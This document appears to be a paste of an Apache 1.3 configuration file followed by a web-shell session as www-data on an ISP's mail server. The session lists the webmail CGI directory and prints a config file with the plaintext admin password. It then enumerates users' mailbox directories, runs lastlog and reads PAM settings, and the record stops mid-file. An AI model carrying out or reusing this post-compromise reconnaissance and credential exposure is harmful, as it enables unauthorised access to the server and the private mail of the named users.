# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
KeepAliveTimeout 15
# Server-pool size regulation.  Rather than making you guess how many
# server processes you need, Apache dynamically adapts to the load it
# sees --- that is, it tries to maintain enough server processes to
# handle the current load, plus a few spare servers to handle transient
# load spikes (e.g., multiple simultaneous requests from a single
# Netscape browser).
# It does this by periodically checking how many servers are waiting
# for a request.  If there are fewer than MinSpareServers, it creates
# a new spare.  If there are more than MaxSpareServers, some of the
# spares die off.  The default values are probably OK for most sites.
MinSpareServers 5
MaxSpareServers 10
# Number of servers to start initially --- should be a reasonable ballpark
# figure.
StartServers 5
# Limit on total number of servers running, i.e., limit on the number
# of clients who can simultaneously connect --- if this limit is ever
# reached, clients will be LOCKED OUT, so it should NOT BE SET TOO LOW.
# It is intended mainly as a brake to keep a runaway server from taking
# the system with it as it spirals down...
MaxClients 150
# MaxRequestsPerChild: the number of requests each child process is
# allowed to process before the child dies.  The child will exit so
# as to avoid problems after prolonged use when Apache (and maybe the
# libraries it uses) leak memory or other resources.  On most systems, this
# isn't really needed, but a few (such as Solaris) do have notable leaks
# in the libraries. For these platforms, set to something like 10000
# or so; a setting of 0 means unlimited.
# NOTE: This value does not include keepalive requests after the initial
#       request per connection. For example, if a child process handles
#       an initial request and 10 subsequent "keptalive" requests, it
#       would only count as 1 request towards this limit.
MaxRequestsPerChild 100
# Listen: Allows you to bind Apache to specific IP addresses and/or
# directive.
#Listen 3000
#Listen 12.34.56.78:80
# BindAddress: You can support virtual hosts with this option. This directive
# is used to tell the server which IP address to listen to. It can either
# contain "*", an IP address, or a fully qualified Internet domain name.
#BindAddress *
# Dynamic Shared Object (DSO) Support
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Please read the file README.DSO in the Apache 1.3 distribution for more
# details about the DSO mechanism and run `apache -l' for the list of already
# built-in (statically linked and thus always available) modules in your apache
# binary.
# Please keep this LoadModule: line here, it is needed for installation.
# LoadModule vhost_alias_module /usr/lib/apache/1.3/mod_vhost_alias.so
# LoadModule env_module /usr/lib/apache/1.3/mod_env.so
LoadModule config_log_module /usr/lib/apache/1.3/mod_log_config.so
LoadModule mime_magic_module /usr/lib/apache/1.3/mod_mime_magic.so
LoadModule mime_module /usr/lib/apache/1.3/mod_mime.so
LoadModule negotiation_module /usr/lib/apache/1.3/mod_negotiation.so
LoadModule status_module /usr/lib/apache/1.3/mod_status.so
# LoadModule info_module /usr/lib/apache/1.3/mod_info.so
# LoadModule includes_module /usr/lib/apache/1.3/mod_include.so
LoadModule autoindex_module /usr/lib/apache/1.3/mod_autoindex.so
LoadModule dir_module /usr/lib/apache/1.3/mod_dir.so
LoadModule cgi_module /usr/lib/apache/1.3/mod_cgi.so
# LoadModule asis_module /usr/lib/apache/1.3/mod_asis.so
# LoadModule imap_module /usr/lib/apache/1.3/mod_imap.so
# LoadModule action_module /usr/lib/apache/1.3/mod_actions.so
# LoadModule speling_module /usr/lib/apache/1.3/mod_speling.so
LoadModule userdir_module /usr/lib/apache/1.3/mod_userdir.so
LoadModule alias_module /usr/lib/apache/1.3/mod_alias.so
LoadModule rewrite_module /usr/lib/apache/1.3/mod_rewrite.so
LoadModule access_module /usr/lib/apache/1.3/mod_access.so
LoadModule auth_module /usr/lib/apache/1.3/mod_auth.so
# LoadModule anon_auth_module /usr/lib/apache/1.3/mod_auth_anon.so
# LoadModule dbm_auth_module /usr/lib/apache/1.3/mod_auth_dbm.so
# LoadModule db_auth_module /usr/lib/apache/1.3/mod_auth_db.so
# LoadModule proxy_module /usr/lib/apache/1.3/libproxy.so
# LoadModule digest_module /usr/lib/apache/1.3/mod_digest.so
# LoadModule cern_meta_module /usr/lib/apache/1.3/mod_cern_meta.so
LoadModule expires_module /usr/lib/apache/1.3/mod_expires.so
# LoadModule headers_module /usr/lib/apache/1.3/mod_headers.so
# LoadModule usertrack_module /usr/lib/apache/1.3/mod_usertrack.so
LoadModule unique_id_module /usr/lib/apache/1.3/mod_unique_id.so
LoadModule setenvif_module /usr/lib/apache/1.3/mod_setenvif.so
# LoadModule sys_auth_module /usr/lib/apache/1.3/mod_auth_sys.so
# LoadModule put_module /usr/lib/apache/1.3/mod_put.so
# LoadModule throttle_module /usr/lib/apache/1.3/mod_throttle.so
# LoadModule allowdev_module /usr/lib/apache/1.3/mod_allowdev.so
# LoadModule eaccess_module /usr/lib/apache/1.3/mod_eaccess.so
# LoadModule roaming_module /usr/lib/apache/1.3/mod_roaming.so
 LoadModule perl_module /usr/lib/apache/1.3/mod_perl.so
# ExtendedStatus: controls whether Apache will generate "full" status
# information (ExtendedStatus On) or just basic information (ExtendedStatus
# Off) when the "server-status" handler is called. The default is Off.
ExtendedStatus On
### Section 2: 'Main' server configuration
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# in which case these default settings will be overridden for the
# virtual host being defined.
# If your ServerType directive (set earlier in the 'Global Environment'
# section) is set to "inetd", the next few directives don't have any
# effect since their settings are defined by the inetd configuration.
# Skip ahead to the ServerAdmin directive.
# Port: The port to which the standalone server listens. For
Port 80
# If you wish apache to run as a different user or group, you must run
# apacheas root initially and it will switch.
# User/Group: The name (or #number) of the user/group to run apache as.
#  . On SCO (ODT 3) use "User nouser" and "Group nogroup".
#  . On HPUX you may not be able to use shared memory as nobody, and the
#    suggested workaround is to create a user www and use that user.
#  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
#  when the value of (unsigned)Group is above 60000;
#  don't use Group nobody on these systems!
User www-data
Group www-data
# ServerAdmin: Your address, where problems with the server should be
# e-mailed.  This address appears on some server-generated pages, such
# as error documents.
ServerAdmin webmaster@titan.hypernet.com.py
# ServerName: allows you to set a host name which is sent back to clients for
# your server if it's different than the one the program would get (i.e., use
# "www" instead of the host's real name).
# Note: You cannot just invent host names and hope they work. The name you
# define here must be a valid DNS name for your host. If you don't understand
# this, ask your network administrator.
# If your host doesn't have a registered DNS name, enter its IP address here.
# You will have to access it by its address (e.g., http://123.45.67.89/)
# anyway, and this will make redirections work in a sensible way.
#ServerName new.host.name
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
DocumentRoot /var/www
# Each directory to which Apache has access, can be configured with respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories).
# First, we configure the "default" to be a very restrictive set of
# permissions.
    Options SymLinksIfOwnerMatch
    AllowOverride None
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
# This should be changed to whatever you set DocumentRoot to.
# This may also be "None", "All", or any combination of "Indexes",
# "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
    Options Indexes Includes FollowSymLinks MultiViews
# This controls which options the .htaccess files in directories can
# override. Can also be "All", or any combination of "Options", "FileInfo",
# "AuthConfig", and "Limit"
    AllowOverride None
# Controls who can get stuff from this server.
    Order allow,deny
    Allow from all
# UserDir: The name of the directory which is appended onto a user's home
# directory if a ~user request is received.
    UserDir public_html
# Control access to UserDir directories.  The following is an example
# for a site where these directories are restricted to read-only.
    AllowOverride FileInfo AuthConfig Limit
    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
        Order allow,deny
        Allow from all
        Order deny,allow
        Deny from all
# DirectoryIndex: Name of the file or files to use as a pre-written HTML
# directory index.  Separate multiple entries with spaces.
    DirectoryIndex index.html index.htm index.shtml index.cgi
# AccessFileName: The name of the file to look for in each directory
# for access control information.
AccessFileName .htaccess
# The following lines prevent .htaccess files from being viewed by
# Web clients.  Since .htaccess files often contain authorization
# information, access is disallowed for security reasons.  Comment
# these lines out if you want Web visitors to see the contents of
# .htaccess files.  If you change the AccessFileName directive above,
# be sure to make the corresponding changes here.
# Also, folks tend to use names such as .htpasswd for password
# files, so this will protect those as well.
    Order allow,deny
    Deny from all
# CacheNegotiatedDocs: By default, Apache sends "Pragma: no-cache" with each
# document that was negotiated on the basis of content. This asks proxy
# servers not to cache the document. Uncommenting the following line disables
# this behavior, and proxies will be allowed to cache the documents.
#CacheNegotiatedDocs
# UseCanonicalName:  (new for 1.3)  With this setting turned on, whenever
# Apache needs to construct a self-referencing URL (a URL that refers back
# to the server the response is coming from) it will use ServerName and
# Port to form a "canonical" name.  With this setting off, Apache will
# use the hostname:port that the client supplied, when possible.  This
# also affects SERVER_NAME and SERVER_PORT in CGI scripts.
UseCanonicalName On
# TypesConfig describes where the mime.types file (or equivalent) is
# to be found.
TypesConfig /etc/mime.types
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
DefaultType text/plain
# The mod_mime_magic module allows the server to use various hints from the
# contents of the file itself to determine its type.  The MIMEMagicFile
# directive tells the module where the hint definitions are located.
# mod_mime_magic is not part of the default server (you have to add
# it yourself with a LoadModule [see the DSO paragraph in the 'Global
# Environment' section], or recompile the server and include mod_mime_magic
# This means that the MIMEMagicFile directive will only be processed if the
# module is part of the server.
    MIMEMagicFile share/magic
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
HostnameLookups Off
# Note that Log files are now rotated by logrotate, not by apache itself.
# This means that apache no longer attempts to magically determine
# where your log files are kept; you have to fill out stanzas in
# /etc/logrotate.d/apache yourself.
# ErrorLog: The location of the error log file.
# container, error messages relating to that virtual host will be
# container, that host's errors will be logged there and not here.
ErrorLog /var/log/apache/error.log
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
LogFormat "%{User-agent}i" agent
# The location and format of the access logfile (Common Logfile Format).
# container, they will be logged here.  Contrariwise, if you *do*
# logged therein and *not* in this file.
#CustomLog /var/log/apache/access.log common
# If you would like to have agent and referer logfiles, uncomment the
# following directives.
#CustomLog /var/log/apache/referer.log referer
#CustomLog /var/log/apache/agent.log agent
# If you prefer a single logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
CustomLog /var/log/apache/access.log combined
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (error documents, FTP directory listings,
# mod_status and mod_info output etc., but not CGI generated documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of:  On | Off | EMail
ServerSignature On
# Aliases: Add here as many aliases as you need (with no limit). The format is
# Alias fakename realname
# Note that if you include a trailing / on fakename then the server will
# require it to be present in the URL.  So "/icons" isn't aliased in this
# example, only "/icons/"..
Alias /icons/ /usr/share/apache/icons/
    Options Indexes MultiViews
    AllowOverride None
    Order allow,deny
    Allow from all
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the realname directory are treated as applications and
# run by the server when requested rather than as documents sent to the client.
# The same rules about trailing "/" apply to ScriptAlias directives as to
# Alias.
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
# "/usr/lib/cgi-bin" could be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
    AllowOverride None
    Options ExecCGI
    Order allow,deny
    Allow from all
# Redirect allows you to tell clients about documents which used to exist in
# your server's namespace, but do not anymore. This allows you to tell the
# clients where to look for the relocated document.
# Format: Redirect old-URI new-URL
# Directives controlling the display of server-generated directory listings.
    # FancyIndexing: whether you want fancy directory indexing or standard
    IndexOptions FancyIndexing NameWidth=*
    # AddIcon* directives tell the server which icon to show for different
    # files or filename extensions.  These are only displayed for
    # FancyIndexed directories.
    AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip
    AddIconByType (TXT,/icons/text.gif) text/*
    AddIconByType (IMG,/icons/image2.gif) image/*
    AddIconByType (SND,/icons/sound2.gif) audio/*
    AddIconByType (VID,/icons/movie.gif) video/*
    AddIcon /icons/binary.gif .bin .exe
    AddIcon /icons/binhex.gif .hqx
    AddIcon /icons/tar.gif .tar
    AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
    AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
    AddIcon /icons/a.gif .ps .ai .eps
    AddIcon /icons/layout.gif .html .shtml .htm .pdf
    AddIcon /icons/text.gif .txt
    AddIcon /icons/c.gif .c
    AddIcon /icons/p.gif .pl .py
    AddIcon /icons/f.gif .for
    AddIcon /icons/dvi.gif .dvi
    AddIcon /icons/uuencoded.gif .uu
    AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
    AddIcon /icons/tex.gif .tex
    AddIcon /icons/bomb.gif core
    AddIcon /icons/deb.gif .deb
    AddIcon /icons/back.gif ..
    AddIcon /icons/hand.right.gif README
    AddIcon /icons/folder.gif ^^DIRECTORY^^
    AddIcon /icons/blank.gif ^^BLANKICON^^
    # DefaultIcon: which icon to show for files which do not have an icon
    # explicitly set.
    DefaultIcon /icons/unknown.gif
    # AddDescription: allows you to place a short description after a file in
    # server-generated indexes.  These are only displayed for FancyIndexed
    # directories.
    # Format: AddDescription "description" filename
    #AddDescription "GZIP compressed document" .gz
    #AddDescription "tar archive" .tar
    #AddDescription "GZIP compressed tar archive" .tgz
    # ReadmeName: the name of the README file the server will look for by
    # default, and append to directory listings.
    # HeaderName: the name of a file which should be prepended to
    # directory indexes.
    # The server will first look for name.html and include it if found.
    # If name.html doesn't exist, the server will then look for name.txt
    # and include it as plaintext if found.
    ReadmeName README
    HeaderName HEADER
    # IndexIgnore: a set of filenames which directory indexing should ignore
    # and not include in the listing.  Shell-style wildcarding is permitted.
    IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t
# Document types.
    # AddEncoding allows you to have certain browsers (Mosaic/X 2.1+)
    # uncompress information on the fly. Note: Not all browsers support
    # this.  Despite the name similarity, the following Add* directives
    # have nothing to do with the FancyIndexing customization
    # directives above.
    AddEncoding x-compress Z
    AddEncoding x-gzip gz tgz
    # AddLanguage: allows you to specify the language of a document. You can
    # then use content negotiation to give a browser a file in a language
    # it can understand.
    # Note 1: The suffix does not have to be the same as the language
    # keyword --- those with documents in Polish (whose net-standard
    # language code is pl) may wish to use "AddLanguage pl .po" to
    # avoid the ambiguity with the common suffix for perl scripts.
    # Note 2: The example entries below illustrate that in quite
    # some cases the two character 'Language' abbriviation is not
    # identical to the two character 'Country' code for its country,
    # E.g. 'Danmark/dk' versus 'Danish/da'.
    # Note 3: In the case of 'ltz' we violate the RFC by using a three char
    # specifier. But there is 'work in progress' to fix this and get
    # the reference data for rfc1766 cleaned up.
    # Danish (da) - Dutch (nl) - English (en) - Estonian (ee)
    # French (fr) - German (de) - Greek-Modern (el)
    # Italian (it) - Portugese (pt) - Luxembourgeois* (ltz)
    # Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cz)
    # Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
    AddLanguage da .dk
    AddLanguage nl .nl
    AddLanguage en .en
    AddLanguage et .ee
    AddLanguage fr .fr
    AddLanguage de .de
    AddLanguage el .el
    AddLanguage it .it
    AddLanguage ja .ja
    AddCharset ISO-2022-JP .jis
    AddLanguage pl .po
    AddCharset ISO-8859-2 .iso-pl
    AddLanguage pt .pt
    AddLanguage pt-br .pt-br
    AddLanguage ltz .lu
    AddLanguage ca .ca
    AddLanguage es .es
    AddLanguage sv .se
    AddLanguage cz .cz
    # LanguagePriority: allows you to give precedence to some languages
    # in case of a tie during content negotiation.
    # Just list the languages in decreasing order of preference. We have
    # more or less alphabetized them here. You probably want to change
    # this.
        LanguagePriority en da nl et fr de el it ja pl pt pt-br ltz ca es sv
    # AddType allows you to tweak mime.types without actually editing
    # it, or to make certain files to be certain types.
    # For example, the PHP 3.x module (not part of the Apache
    # distribution - see http://www.php.net) will typically use:
    #AddType application/x-httpd-php3 .php3
    #AddType application/x-httpd-php3-source .phps
    # And for PHP 4.x, use:
    #AddType application/x-httpd-php .php
    #AddType application/x-httpd-php-source .phps
    AddType application/x-tar .tgz
    AddType image/bmp .bmp
    # hdml
    AddType text/x-hdml .hdml
    # AddHandler allows you to map certain file extensions to "handlers",
    # actions unrelated to filetype. These can be either built into
    # the server or added with the Action command (see below).
    # If you want to use server side includes, or CGI outside
    # ScriptAliased directories, uncomment the following lines.
    # To use CGI scripts:
    #AddHandler cgi-script .cgi .sh .pl
    # To use server-parsed HTML files
    #AddType text/html .shtml
    #AddHandler server-parsed .shtml
    # Uncomment the following line to enable Apache's send-asis HTTP
    # file feature.
    #AddHandler send-as-is asis
    # If you wish to use server-parsed imagemap files, use
    #AddHandler imap-file map
    # To enable type maps, you might want to use
    #AddHandler type-map var
# End of document types.
# Default charset to iso-8859-1 (ttp://www.apache.org/info/css-security/).
AddDefaultCharset on
# Action: lets you define media types that will execute a script whenever
# a matching file is called. This eliminates the need for repeated URL
# pathnames for oft-used CGI file processors.
# Format: Action media/type /cgi-script/location
# Format: Action handler-name /cgi-script/location
# MetaDir: specifies the name of the directory in which Apache can find
# meta information files. These files contain additional HTTP headers
# to include when sending the document
#MetaDir .web
# MetaSuffix: specifies the file name suffix for the file containing the
# meta information.
#MetaSuffix .meta
# Customizable error response (Apache style)
#  these come in three flavors
#    1) plain text
#ErrorDocument 500 "The server made a boo boo.
#  n.b.  the (") marks it as text, it does not get output
#    2) local redirects
#ErrorDocument 404 /missing.html
#  to redirect to local URL /missing.html
#ErrorDocument 404 /cgi-bin/missing_handler.pl
#  N.B.: You can redirect to a script or a document using server-side-includes.
#    3) external redirects
#ErrorDocument 402 http://some.other_server.com/subscription_info.html
#  N.B.: Many of the environment variables associated with the original
#  request will *not* be available to such a script.
    # The following directives modify normal HTTP response behavior.
    # The first directive disables keepalive for Netscape 2.x and browsers that
    # spoof it. There are known problems with these browser implementations.
    # The second directive is for Microsoft Internet Explorer 4.0b2
    # which has a broken HTTP/1.1 implementation and does not properly
    # support keepalive when it is used on 301 or 302 (redirect) responses.
    BrowserMatch "Mozilla/2" nokeepalive
    BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
    # The following directive disables HTTP/1.1 responses to browsers which
    # are in violation of the HTTP/1.0 spec by not being able to grok a
    # basic 1.1 response.
    BrowserMatch "RealPlayer 4\.0" force-response-1.0
    BrowserMatch "Java/1\.0" force-response-1.0
    BrowserMatch "JDK/1\.0" force-response-1.0
# If the perl module is installed, this will be enabled.
  Alias /perl/ /var/www/perl/
    SetHandler perl-script
    PerlHandler Apache::Registry
    Options +ExecCGI
# Allow http put (such as Netscape Gold's publish feature)
# Use htpasswd to generate /etc/apache/passwd.
# You must unremark these two lines at the top of this file as well:
#LoadModule put_module      modules/mod_put.so
#Alias /upload /tmp
#    EnablePut On
#    AuthType Basic
#    AuthName Temporary
#    AuthUserFile /etc/apache/passwd
#    EnableDelete Off
#    umask 007
#   require valid-user
# Allow server status reports, with the URL of http://servername/server-status
# Change the ".your_domain.com" to match your domain to enable.
#    SetHandler server-status
#    Order deny,allow
#    Deny from all
#    Allow from .your_domain.com
# Allow remote server configuration reports, with the URL of
#  http://servername/server-info (requires that mod_info.c be loaded).
# Change the ".your_domain.com" to match your domain to enable.
#    SetHandler server-info
#    Order deny,allow
#    Deny from all
#    Allow from .your_domain.com
# Allow access to local system documentation from localhost.
# (Debian Policy assumes /usr/share/doc is "/doc/", at least from the localhost.)
Alias /doc/ /usr/share/doc/
  order deny,allow
  deny from all
  allow from 127.0.0.0/255.0.0.0
  Options Indexes FollowSymLinks MultiViews
# There have been reports of people trying to abuse an old bug from pre-1.1
# days.  This bug involved a CGI script distributed as a part of Apache.
# By uncommenting these lines you can redirect these attacks to a logging
# script on phf.apache.org.  Or, you can record them yourself, using the script
# support/phf_abuse_log.cgi.
#    Deny from all
#    ErrorDocument 403 http://phf.apache.org/phf_abuse_log.cgi
    # Proxy Server directives. Uncomment the following lines to
    # enable the proxy server:
    #ProxyRequests On
    #    Order deny,allow
    #    Deny from all
    #    Allow from .your_domain.com
# Enable/disable the handling of HTTP/1.1 "Via:" headers.
# ("Full" adds the server version; "Block" removes all outgoing Via: headers)
# Set to one of: Off | On | Full | Block
#ProxyVia On
# To enable the cache as well, edit and uncomment the following lines:
# (no cacheing without CacheRoot)
#CacheRoot "/var/cache/apache"
#CacheSize 5
#CacheGcInterval 4
#CacheMaxExpire 24
#CacheLastModifiedFactor 0.1
#CacheDefaultExpire 1
#NoCache a_domain.com another_domain.edu joes.garage_sale.com
# End of proxy directives.
### Section 3: Virtual Hosts
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them.
# for further details before you try to setup virtual hosts.
# You may use the command line option '-S' to verify your virtual host
# configuration.
# If you want to use name-based virtual hosts you need to define at
# least one IP address (and port number) for them.
#NameVirtualHost 12.34.56.78:80
#NameVirtualHost 12.34.56.78
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
#    ServerAdmin webmaster@host.some_domain.com
#    DocumentRoot /www/docs/host.some_domain.com
#    ServerName host.some_domain.com
#    ErrorLog logs/host.some_domain.com-error.log
#    CustomLog logs/host.some_domain.com-access.log common
# ADDED BY @Mail Wed Mar 17 19:16:51 2004
order allow,deny
deny from all
$ exit
$ ls -la
total 184
drwxr-xr-x    3 root     root         4096 Jan 21  2001 .
drwxr-xr-x    3 root     root         4096 Mar 17  2004 ..
-rw-r--r--    1 root     root         9892 Jan 21  2001 ChangeLog
-rw-r--r--    1 root     root         1202 Jan 21  2001 INSTALL
-rwxr-xr-x    1 root     root        13118 Feb 19  2001 addressbook.cgi
-rwxr-xr-x    1 root     root         7675 Feb 19  2001 compose.cgi
-rwxr-xr-x    1 root     root         1808 Feb 19  2001 delete.cgi
-rw-r--r--    1 root     root          425 Feb 19  2001 html.end
-rw-r--r--    1 root     root          852 Feb 19  2001 html.top
drwxr-xr-x    2 root     root         4096 Jan 21  2001 images
-rwxr-xr-x    1 root     root        17251 Feb 19  2001 inbox.cgi
-rwxr-xr-x    1 root     root         7642 Jan 21  2001 install.pl
-rwxr-xr-x    1 root     root         2797 Feb 26  2001 login.cgi
-rwxr-xr-x    1 root     root         2099 Feb 19  2001 logout.cgi
-rwxr-xr-x    1 root     root         1165 Feb 19  2001 prefs.cgi
-rwxr-xr-x    1 root     root        11236 Dec 21  2000 sendmessage.cgi
-rwxr-xr-x    1 root     root        16975 Feb 19  2001 showmessage.cgi
-rw-r--r--    1 root     root         5390 May 31  2000 userprefs.cgi
-rwxr-xr-x    1 root     root         9596 Dec 27  2000 w3admin.cgi
-rw-r--r--    1 nobody   root          849 Mar 17  2004 w3mail.conf
-rwxr-xr-x    1 root     root        21004 Feb 19  2001 w3vars.cgi
$ cat w3mail.conf
@mailservers = ("hypernet.com.py");
@mailserver_replyto = ("hypernet.com.py");
$smtpserv = "hypernet.com.py";
$cgidir = "/cgi-bin/w3mail";
$mimedir = "/var/www/w3mime";
$mimehttp = "/w3mime";
$imageshttp = "/w3images";
$homepage = "http://www.hypernet.com.py/home.htm";
$datadir = "/var/w3mail";
$adminuser = "admin";
$adminpass = "lemb981924";
$style = "/w3images/w3mail.css";
$bgcolor = "#696969";
$link = "blue";
$vlink = "blue";
$alink = "red";
$hover = "#007FFF";
$table_head = "#c0d3ff";
$table_bg = "#fff9f9";
$bg_dark = "#c0d3ff";
$bg_light = "#fff9f9";
$show_messages = "10";
$def_signature = "Este mail fue enviado utilizando HyperMAIL.";
$adminEmail = "soporte\@hypernet.com.py";
$columns = "75";
$post_max = "950";
$system_rm = "/bin/rm";
$maxpost = "100";
$ head -5 w3mail.conf
@mailservers = ("hypernet.com.py");
@mailserver_replyto = ("hypernet.com.py");
$smtpserv = "hypernet.com.py";
$cgidir = "/cgi-bin/w3mail";
$mimedir = "/var/www/w3mime";
$ cat w3mail.conf | grep data
$datadir = "/var/w3mail";
$ ls -l /var/w3mail/
total 4
drwx------   48 www-data www-data     4096 May 29  2004 hypernet.com.py
$ ls -l /var/w3mail/hy*
total 184
drwx------    3 www-data www-data     4096 Dec 26  2003  chesco
drwx------    3 www-data www-data     4096 Jul 23  2004 ADOLESCENTE
drwx------    3 www-data www-data     4096 Dec 13  2002 BFERNANDEZ
drwx------    3 www-data www-data     4096 Nov 11  2003 Masixsa
drwx------    3 www-data www-data     4096 Jan 26  2004 Pablino
drwx------    3 www-data www-data     4096 May 20  2003 TURISMO
drwx------    3 www-data www-data     4096 Jan 26  2004 adolescente
drwx------    3 www-data www-data     4096 Oct  9  2003 agemar
drwx------    3 www-data www-data     4096 Apr 15  2002 aginter
drwx------    3 www-data www-data     4096 Jul 23  2004 agrijalba
drwx------    3 www-data www-data     4096 Sep  8  2003 ale
drwx------    3 www-data www-data     4096 Nov  9  2001 alternativas
drwx------    3 www-data www-data     4096 May 13 23:15 analia
drwx------    3 www-data www-data     4096 Nov 18  2002 andresdelgado
drwx------    3 www-data www-data     4096 Aug 10  2002 bfernandez
drwx------    3 www-data www-data     4096 Oct 14  2003 bsacco
drwx------    3 www-data www-data     4096 Aug 16  2001 candy
drwx------    3 www-data www-data     4096 Apr  3  2001 ccarvallo
drwx------    3 www-data www-data     4096 Apr 17 13:31 chesco
drwx------    3 www-data www-data     4096 Apr  5  2001 classic
drwx------    3 www-data www-data     4096 Jun 26  2001 crosales
drwx------    3 www-data www-data     4096 Feb  2  2002 delpar
drwx------    3 www-data www-data     4096 Jun 24  2001 drolon
drwx------    3 www-data www-data     4096 Oct  9  2003 fkrishpy
drwx------    3 www-data www-data     4096 Mar 10  2003 fliasosky
drwx------    3 www-data www-data     4096 Sep 24  2004 grivas
drwx------    3 www-data www-data     4096 Mar 30  2001 htour
drwx------    3 www-data www-data     4096 Feb  1  2002 hugomart
drwx------    3 www-data www-data     4096 Jul 28  2001 jpinilla
drwx------    3 www-data www-data     4096 May 24  2001 jrodriguez
drwx------    3 www-data www-data     4096 Jun  5  2002 jtoral
drwx------    3 www-data www-data     4096 Apr  6  2001 lbarrios
drwx------    3 www-data www-data     4096 Mar  4  2003 lemirson
drwx------    3 www-data www-data     4096 Nov 15  2003 masixsa
drwx------    3 www-data www-data     4096 Sep 21  2001 ora
drwx------    3 www-data www-data     4096 Jul 12  2003 pablino
drwx------    3 www-data www-data     4096 Jul  4  2002 planeta
drwx------    3 www-data www-data     4096 Apr 20  2001 rcasaccia
drwx------    3 www-data www-data     4096 Aug 15  2001 rcuadrado
drwx------    3 www-data www-data     4096 Jul 24  2001 rene
drwx------    3 www-data www-data     4096 Oct  9  2003 rodolfo
drwx------    3 www-data www-data     4096 Sep  7  2002 samtorales
drwx------    3 www-data www-data     4096 Apr  4  2001 turinter
drwx------    3 www-data www-data     4096 Jun 10  2003 turismo
drwx------    3 www-data www-data     4096 Mar 29  2003 valerao
drwx------    3 www-data www-data     4096 Oct 25  2003 vsanchez
$ exit
$ id
$ ps -auxw
$ ls
$ id
$ exit
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd /tmp;ls -la; w;
total 8
drwxrwxrwt    2 root     root         4096 May 20 06:25 .
drwxr-xr-x   20 root     root         4096 Mar 16  2004 ..
 13:10:44 up 3 days, 19:59,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
$ lastlog
Username         Port     From             Latest
root             pts/0    ppp019.hypernet. Fri May 13 11:51:37 -0400 2005
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
postgres                                   **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
operator                                   **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
identd                                     **Never logged in**
sshd                                       **Never logged in**
telnetd                                    **Never logged in**
webmaster                                  **Never logged in**
smmsp                                      **Never logged in**
$ ls -l /lib | grep pam
-rw-r--r--    1 root     root        29420 Jan 21  2002 libpam.so.0.72
-rw-r--r--    1 root     root         7500 Jan 21  2002 libpam_misc.so.0.72
-rw-r--r--    1 root     root         9800 Jan 21  2002 libpamc.so.0.72
$ ls -l /etc/pam.d/
total 48
-rw-r--r--    1 root     root          306 Mar 16  2004 chfn
-rw-r--r--    1 root     root          509 Mar 16  2004 chsh
-rw-r--r--    1 root     root          197 Mar 16  2004 cron
-rw-r--r--    1 root     root          529 Apr 18  2002 ftp
-rw-r--r--    1 root     root         4017 Mar 16  2004 login
-rw-r--r--    1 root     root          345 Mar 16  2004 other
-rw-r--r--    1 root     root         1242 Mar 16  2004 passwd
-rw-r--r--    1 root     root          182 Mar 16  2004 ppp
-rw-r--r--    1 root     root          136 Feb  6  2002 screen
-rw-r--r--    1 root     root          478 Sep 16  2003 smtp
-rw-r--r--    1 root     root          771 Jun 28  2002 ssh
-rw-r--r--    1 root     root         1388 Mar 16  2004 su
$ cat /etc/pam.d/login
# The PAM configuration file for the Shadow `login' service
# NOTE: If you use a session module (such as kerberos or NIS+)
# that retains persistent credentials (like key caches, etc), you
# need to enable the `CLOSE_SESSIONS' option in /etc/login.defs
# in order for login to stay around until after logout to call
# pam_close_session() and cleanup.
# Outputs an issue file prior to each login prompt (Replaces the
# ISSUE_FILE option from login.defs). Uncomment for use
# auth       required   pam_issue.so issue=/etc/issue
